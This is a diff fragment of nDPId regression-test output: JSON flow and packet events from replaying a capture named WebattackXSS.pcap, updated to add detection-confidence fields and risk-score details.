+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347782928,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347783176,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347783176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347783176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8URhAAD4GdLisEAABwKgKMu3SAFAelFVWAAAAAKACchD3bAAAAgQFtAQCCAoBPAROAAAAAAEDAwc="}
@@ -2768,18 +2768,18 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GCRAAD4GraysEAABwKgKMu4wAFDmKhURAAAAAKACchBm1gAAAgQFtAQCCAoBPA01AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":2,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347792291,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7jDnRnKf5ioVEqAScSArPwAAAgQFtAQCCAoD5d6qATwNNQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":3,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GCVAAD4GrbOsEAABwKgKMu4wAFDmKhUS50ZyoIAQAOXKRgAAAQEICgE8DTUD5d6q"}
-00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347665473,"flow_last_seen":1499347670803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347670582,"flow_last_seen":1499347675804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347673136,"flow_last_seen":1499347678804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347674433,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347793575,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347793575,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6882,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1499347793575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347793575,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86x9AAD4G2rCsEAABwKgKMu4+AFCp1uVpAAAAAKACchDRggAAAgQFtAQCCAoBPA52AAAAAAEDAwc="}
@@ -2805,15 +2805,15 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347678198,"flow_last_seen":1499347683805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347679469,"flow_last_seen":1499347684805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347680746,"flow_last_seen":1499347685805,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347683313,"flow_last_seen":1499347688806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347684563,"flow_last_seen":1499347689806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347803577,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
